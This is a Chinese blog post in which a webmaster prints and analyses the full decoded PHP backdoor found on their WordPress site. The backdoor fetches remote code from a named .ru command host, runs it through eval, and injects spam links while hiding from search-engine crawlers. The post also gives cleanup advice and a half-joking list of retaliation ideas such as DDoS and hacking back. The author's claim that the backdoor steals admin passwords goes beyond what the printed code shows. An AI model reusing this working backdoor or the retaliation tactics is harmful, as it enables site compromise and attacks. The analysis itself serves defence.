1200字范文 > 黑客挂马木马病毒研究黑客木马的攻击与防止木马的威力木马运作流程黑客的高明

黑客挂马木马病毒研究黑客木马的攻击与防止木马的威力木马运作流程黑客的高明

时间：2019-02-24 20:30:08

1.黑客向我网站植入了木马:

黑客通过一切任何可能的办法，在我的网站上植入了木马，解码后得到：

<?phpif (function_exists('get_url_999') === false) {function get_url_999($url){$content = "";$content = @trycurl_999($url);if ($content !== false)return $content;$content = @tryfile_999($url);if ($content !== false)return $content;$content = @tryfopen_999($url);if ($content !== false)return $content;$content = @tryfsockopen_999($url);if ($content !== false)return $content;$content = @trysocket_999($url);if ($content !== false)return $content;return '';}}if (function_exists('trycurl_999') === false) {function trycurl_999($url){if (function_exists('curl_init') === false)return false;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 5);curl_setopt($ch, CURLOPT_HEADER, 0);$result = curl_exec($ch);curl_close($ch);if ($result == "")return false;return $result;}}if (function_exists('tryfile_999') === false) {function tryfile_999($url){if (function_exists('file') === false)return false;$inc = @file($url);$buf = @implode('', $inc);if ($buf == "")return false;return $buf;}}if (function_exists('tryfopen_999') === false) {function tryfopen_999($url){if (function_exists('fopen') === false)return false;$buf = '';$f = @fopen($url, 'r');if ($f) {while (! feof($f)) {$buf .= fread($f, 10000);}fclose($f);} elsereturn false;if ($buf == "")return false;return $buf;}}if (function_exists('tryfsockopen_999') === false) {function tryfsockopen_999($url){if (function_exists('fsockopen') === false)return false;$p = @parse_url($url);$host = $p['host'];$uri = $p['path'] . '?' . $p['query'];$f = @fsockopen($host, 80, $errno, $errstr, 30);if (! $f)return false;$request = "GET $uri HTTP/1.0\n";$request .= "Host: $host\n\n";fwrite($f, $request);$buf = '';while (! feof($f)) {$buf .= fread($f, 10000);}fclose($f);if ($buf == "")return false;list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);return $buf;}}if (function_exists('trysocket_999') === false) {function trysocket_999($url){if (function_exists('socket_create') === false)return false;$p = @parse_url($url);$host = $p['host'];$uri = $p['path'] . '?' . $p['query'];$ip1 = @gethostbyname($host);$ip2 = @long2ip(@ip2long($ip1));if ($ip1 != $ip2)return false;$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);if (! @socket_connect($sock, $ip1, 80)) {@socket_close($sock);return false;}$request = "GET $uri HTTP/1.0\n";$request .= "Host: $host\n\n";socket_write($sock, $request);$buf = '';while ($t = socket_read($sock, 10000)) {$buf .= $t;}@socket_close($sock);if ($buf == "")return false;list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);return $buf;}}if (function_exists('str_replace_first') === false) {function str_replace_first($search, $replace, $subject){$pos = stripos($subject, $search);if ($pos !== false) {$subject = substr_replace($subject, $replace, $pos, strlen($search));}return $subject;}}if (function_exists('is_bot_ua') === false) {function is_bot_ua(){$bot = 0;$ua = @$_SERVER['HTTP_USER_AGENT'];if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))$bot = 1;if (stristr($ua, "bingbot") || stristr($ua, "googlebot"))$bot = 1;return $bot;}}if (function_exists('is_googlebot_ip') === false) {function is_googlebot_ip(){$k = 0;$ip = sprintf("%u", @ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip >= 1123631104) && ($ip <= 1123639295))$k = 1;return $k;}}if (function_exists('update_file_999') === false) {function update_file_999(){$uri = "g.php?t=m&i=c49e6e5aa2acb188f54a38b960ae901d";$actual1 = "http://cooperjsutf8.ru/" . $uri;$actual2 = "/" . $uri;$val = get_url_999($actual1);if ($val == "")$val = get_url_999($actual2);if (strstr($val, "|||CODE|||")) {list ($val, $code) = explode("|||CODE|||", $val);eval(base64_decode($code));}return $val;}}if (function_exists('callback_function_php') === false) {function callback_function_php($p){if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in())) {return $p;}if (stristr($_SERVER['REQUEST_URI'], "xmlrpc.php")) {return $p;}$x = '{options_names}';$buf = "";$update = 0;$k = get_option($x);if ($k === FALSE) {$emp = array();if (! add_option($x, $emp, '', 'no')) {return $p;}$update = 1;} else {$ctime = time() - @$k[1];if ($ctime > 3600 * 12) {$update = 1;}}if ($update) {$val = update_file_999();$k = array();$k[0] = $val;$k[1] = time();if (! update_option($x, $k)) {return $p;}}if (! $k = get_option($x)) {return $p;}$buf = @$k[0];if ($buf == "") {return $p;}list ($type, $text) = @explode("|||", $buf);if ($text == "")return $p;$type += 0;$bot = 0;if ($type == 0) {$buf1 = @base64_decode($text);list ($tagjs, $js, $tagtext1, $text1) = @explode("|||", $buf1);if (($tagjs != "") && (stristr($p, $tagjs))) {$p = str_replace_first($tagjs, $js . " " . $tagjs, $p);} else {$p = $p . $js;}if (($tagtext1 != "") && (stristr($p, $tagtext1))) {$p = str_replace_first($tagtext1, $text1 . " " . $tagtext1, $p);} else {$p = $p . $text1;}} else if (($type == 1) || ($type == 2) || ($type == 3) || ($type == 4)) {if (($type == 1) || ($type == 4)) {$bot = is_bot_ua();}if (($type == 2) || ($type == 3)) {$bot = is_googlebot_ip();}if ($bot) {$buf1 = @base64_decode($text);list ($tag, $text1) = @explode("|||", $buf1);if (($tag != "") && ($text1 != "")) {if (stristr($p, $tag)) {if (($type == 3) || ($type == 4)) {$p = @str_ireplace($tag, $tag . " " . $text1, $p);} else {$p = str_replace_first($tag, $tag . " " . $text1, $p);}} else {$p = $p . $text1;}}}}return $p;}}if (function_exists('ob_start')) {ob_start("callback_function_php");}

2.木马准备怎么运作？

通过一切 *_999方法向远程通信，这2个是木马黑客的操控连接（建议大牛向共产党举报他们）：

/g.php?t=m&i=c49e6e5aa2acb188f54a38b960ae901dhttp://cooperjsutf8.ru/g.php?t=m&i=c49e6e5aa2acb188f54a38b960ae901d

其中i的值是个加密串，个人猜测，这涉及到木马集团的利益分成或者其他分门别类的用途。。

最后，获得可变的木马变种，如：

0|||PC9kaXY+fHx8fHx8PC9kaXY+fHx8PGEgaHJlZj0iaHR0cDovL2JsYWlyZ3JvdXB1c2EuY29tL2luc3RhbGxtZW50LWxvYW5zLWluLWhhbXB0b24tdmEvIj5pbnN0YWxsbWVudCBsb2FucyBpbiBoYW1wdG9uIHZhPC9hPiAK

经过工程师LET解码后，得到：

</div>||||||</div>|||<a href="/installment-loans-in-hampton-va/">installment loans in hampton va</a>

就暂时分析到这，以后有时间待续。。

3.木马的威力

1.通过上述，这样，就向我网站上，加入了黑链！但是这不算什么！

2.更可怕的是，我登陆后台管理员后，木马自动把我账号密码通知到了木马集团。。。

3.更可怕的是，还有其他的，都受到他们远程的控制，他们想干嘛，就干嘛，远程操控肉鸡！如：

1.格式化我的一切资料 2.偷取我的一切资料、数据库、私密文件、商业数据。。。 3.分析我的一切行为。。。

4.木马的聪明之处：社工学发挥的淋漓尽致！SEO大师！

1.聪明的在我的网站副标题旁，增加了他们的黑链。。想在哪加就在哪加，想怎么加就怎么加。 2.可以判断是否已经黑过我了，黑过，就放过这个文件，没有黑过，就继续黑。 3.通过远程遥控的方式来选择如何方式判断是否为蜘蛛爬虫！如：可以选择HTTP_USER_AGENT判断是否google等蜘蛛，也可以通过IP范围判断是否为google引擎。 4.通过上述后，如果是google等蜘蛛来访问，木马就躲避起来，不做任何破坏；如果是正常访客，嘿嘿，木马就开始使坏的工作了，这样就躲避了google等蜘蛛的检查！ 5.所挂的马在远程，我们受害者根据黑链搜我们的文件找挂马源头，怎么也找不到，因为根本不在本地，在远程。。

5.网站被黑了木马光顾了，我该怎么办？

1.把整个网站下载到本地，立刻断网！（没有断网，在网上修复，这也许是木马久治不愈的原因。。） 2.更改后台密码！

3.升级网站！ 4.用户、后台登陆地方增加验证码

5.检测文件，把木马及其残留揪出来！这时也许不仅仅一家木马光顾了你！（防止搞不干净。。） 6.如果可能的话，也要检查数据库！（防止搞不干净。。）

7.如果有条件的话，最好选择独立服务器，不要和别人共享IP那种的，黑客也许是通过别人的站点拿到服务器，殃及池鱼所以我们才栽的！ 8.实施关注你的网站，不要等到SEO收录很久了，才发现！晚了！

6.作为工程师的作者，你被挂马后生气么？

我的确很生气！

但是并不建议广大受害同胞实施以下几个步骤或者全部实施：

1.直接发邮件警告、更改他们主页，友好的通知他们，让他们老实点，不要同行自相残杀！

2.QQ群、淘宝、朋友。。寻找黑客高手，请“杀手”帮忙，重金之下，必有勇夫！ 3.把他的站也黑了，也对他们进行挂马，并广而告之，这个站是有木马后门，有需要的么。。。以牙还牙！ 4.把他们数据进行采集后，网络共享到网盘、贴吧。。。发挥你的想象吧。。 5.对他们进行ddos攻击，让他们网站无法正常服务！

6.自认倒霉，你就从了吧，做个良民，狗咬你一口，你不能咬狗一口。。安慰自己吧！